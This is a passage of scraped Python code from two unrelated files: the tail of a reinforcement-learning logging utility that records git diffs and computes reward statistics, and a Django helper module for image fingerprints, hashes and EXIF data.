if code_diff_staged is not None and len(code_diff_staged) > 0:
with open(osp.join(logdir, diff_staged_file_name), "w") as f:
f.write(code_diff_staged + '\n')
with open(osp.join(logdir, "git_infos.txt"), "a") as f:
f.write("directory: {}".format(directory))
f.write('\n')
f.write("git hash: {}".format(commit_hash))
f.write('\n')
f.write("git branch name: {}".format(branch_name))
f.write('\n\n')
def get_git_info():
try:
import git
dirs = [
'/home/vitchyr/git/handful-of-trials/',
'/home/vitchyr/git/multiworld/',
]
git_infos = []
for directory in dirs:
# Idk how to query these things, so I'm just doing try-catch
try:
repo = git.Repo(directory)
try:
branch_name = repo.active_branch.name
except TypeError:
branch_name = '[DETACHED]'
git_infos.append(GitInfo(
directory=directory,
code_diff=repo.git.diff(None),
code_diff_staged=repo.git.diff('--staged'),
commit_hash=repo.head.commit.hexsha,
branch_name=branch_name,
))
except git.exc.InvalidGitRepositoryError:
pass
except ImportError:
git_infos = None
return git_infos
class MyEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, type):
return {'$class': o.__module__ + "." + o.__name__}
elif isinstance(o, Enum):
return {
'$enum': o.__module__ + "." + o.__class__.__name__ + '.' + o.name
}
elif callable(o):
return {
'$function': o.__module__ + "." + o.__name__
}
try:
return json.JSONEncoder.default(self, o)
except TypeError as e:
if isinstance(o, object):
return {
'$object': str(o)
}
else:
raise e
def get_generic_path_information(paths, stat_prefix=''):
"""
Get an OrderedDict with a bunch of statistic names and values.
"""
statistics = OrderedDict()
if len(paths) == 0:
return statistics
returns = [sum(path["rewards"]) for path in paths]
rewards = np.vstack([path["rewards"] for path in paths])
statistics.update(create_stats_ordered_dict('Rewards', rewards,
stat_prefix=stat_prefix))
statistics.update(create_stats_ordered_dict('Returns', returns,
stat_prefix=stat_prefix))
actions = [path["ac"] for path in paths]
if len(actions[0].shape) == 1:
actions = np.hstack([path["ac"] for path in paths])
else:
actions = np.vstack([path["ac"] for path in paths])
statistics.update(create_stats_ordered_dict(
'Actions', actions, stat_prefix=stat_prefix
))
statistics[stat_prefix + 'Num Paths'] = len(paths)
for info_key in ['env_infos']:
if info_key in paths[0]:
all_env_infos = [
list_of_dicts__to__dict_of_lists(p[info_key])
for p in paths
]
for k in all_env_infos[0].keys():
final_ks = np.array([info[k][-1] for info in all_env_infos])
first_ks = np.array([info[k][0] for info in all_env_infos])
all_ks = np.concatenate([info[k] for info in all_env_infos])
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
final_ks,
stat_prefix='{}/final/'.format(info_key),
))
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
first_ks,
stat_prefix='{}/initial/'.format(info_key),
))
statistics.update(create_stats_ordered_dict(
stat_prefix + k,
all_ks,
stat_prefix='{}/'.format(info_key),
))
return statistics
def create_stats_ordered_dict(
name,
data,
stat_prefix=None,
always_show_all_stats=True,
exclude_max_min=False,
):
if stat_prefix is not None:
name = "{}{}".format(stat_prefix, name)
if isinstance(data, Number):
return OrderedDict({name: data})
if len(data) == 0:
return OrderedDict()
if isinstance(data, tuple):
ordered_dict = OrderedDict()
for number, d in enumerate(data):
sub_dict = create_stats_ordered_dict(
"{0}_{1}".format(name, number),
d,
)
ordered_dict.update(sub_dict)
return ordered_dict
if isinstance(data, list):
try:
iter(data[0])
except TypeError:
pass
else:
data = np.concatenate(data)
if (isinstance(data, np.ndarray) and data.size == 1
and not always_show_all_stats):
return OrderedDict({name: float(data)})
stats = OrderedDict([
(name + ' Mean', np.mean(data)),
(name + ' Std', np.std(data)),
])
if not exclude_max_min:
stats[name + ' Max'] = np.max(data).astype(np.float32)
stats[name + ' Min'] = np.min(data).astype(np.float32)
return stats
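# Example (illustrative): create_stats_ordered_dict('Returns', [1.0, 2.0, 3.0])
# returns an OrderedDict with 'Returns Mean', 'Returns Std', 'Returns Max' and
# 'Returns Min' entries.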
def list_of_dicts__to__dict_of_lists(lst):
"""
```
x = [
{'foo': 3, 'bar': 1},
{'foo': 4, 'bar': 2},
{'foo': 5, 'bar': 3},
]
ppp.list_of_dicts__to__dict_of_lists(x)
# Output:
# {'foo': [3, 4, 5], 'bar': [1, 2, 3]}
```
"""
if len(lst) == 0:
return {}
keys = lst[0].keys()
output_dict = defaultdict(list)
for d in lst:
assert set(d.keys()) == set(keys)
for k in keys:
output_dict[k].append(d[k])
return output_dict
| StarcoderdataPython |
144342 | <gh_stars>10-100
import base64
import hashlib
from io import BytesIO
import logging
from pathlib import Path
from typing import Dict, Union
import PIL
from django.core.files import File as DjangoFile
import imagehash
try:
from storages.backends.s3boto3 import S3Boto3StorageFile as BotoFile
except ImportError:
BotoFile = type('BotoFileFallbackClass', (), {})
logger = logging.getLogger(__name__)
Fileish = Union[str, bytes, Path, DjangoFile]
FINGERPRINT_SIZE = 16
def image_from_fingerprint(fingerprint):
"""Create tiny fingerprint image from 11x11 b64 encoded string
for image hash comparisons"""
data = base64.b64decode(fingerprint)
size = int(len(data)**0.5)
return PIL.Image.frombytes('L', (size, size), data)
def image_to_fingerprint(image, size=FINGERPRINT_SIZE):
"""Create b64encoded image signature for image hash comparisons"""
data = image.copy().convert('L').resize((size, size)).getdata()
return base64.b64encode(bytes(data)).decode()
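# Note: image_to_fingerprint() emits a base64 string of size*size grayscale bytes,
# and image_from_fingerprint() rebuilds the tiny PIL image from that string, so the
# two functions round-trip.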
def read_data(value: Fileish) -> bytes:
"""Read raw data from Fileish like object"""
if isinstance(value, str):
return Path(value).read_bytes()
elif isinstance(value, bytes):
return value
elif isinstance(value, Path):
return value.read_bytes()
elif isinstance(value, DjangoFile):
value.open('rb')
return value.read()
else:
# try:
# value.seek(0)
# except AttributeError:
# pass
return value.read()
# elif isinstance(value, BotoFile):
# return value.read()
def pil_image(fp: Fileish) -> PIL.Image.Image:
if isinstance(fp, PIL.Image.Image):
return fp
blob = BytesIO(read_data(fp))
return PIL.Image.open(blob)
def valid_image(fp: Fileish) -> bool:
try:
pil_image(fp).verify()
return True
except (SyntaxError, OSError, RuntimeError, ValueError, TypeError) as e:
return False
def get_md5(fp: Fileish) -> str:
"""Hexadecimal md5 hash of a Fileish stored on local disk"""
hasher = hashlib.md5(read_data(fp))
return hasher.hexdigest()
def get_mtime(file: Union[Path, str]) -> int:
"""Modification time"""
return int(Path(file).stat().st_mtime)
def get_filesize(fp: Fileish) -> int:
"""Get file size in bytes"""
if isinstance(fp, Path):
return fp.stat().st_size
else:
return len(read_data(fp))
def get_imagehashes(fp: Fileish,
size=FINGERPRINT_SIZE) -> Dict[str, imagehash.ImageHash]:
"""Calculate perceptual hashes for comparison of identical images"""
try:
img = pil_image(fp)
thumb = img.resize((size, size), PIL.Image.BILINEAR).convert('L')
return dict(
ahash=imagehash.average_hash(thumb),
phash=imagehash.phash(thumb),
whash=imagehash.whash(thumb),
dhash=imagehash.dhash(thumb),
)
except OSError: # corrupt image file probably
return {}
def get_exif(fp: Fileish) -> dict:
try:
return pil_image(fp)._getexif() or {}
except (AttributeError, OSError):
pass # file format has no exif.
except Exception: # unexpected error
logger.exception('Cannot extract exif data')
return {}
def get_mimetype(fp: Fileish) -> str:
return PIL.Image.MIME.get(pil_image(fp).format)
def s3_md5(s3key):
"""Hexadecimal md5 hash of a Fileish stored in Amazon S3"""
return s3key.etag.strip('"').strip("'")
| StarcoderdataPython |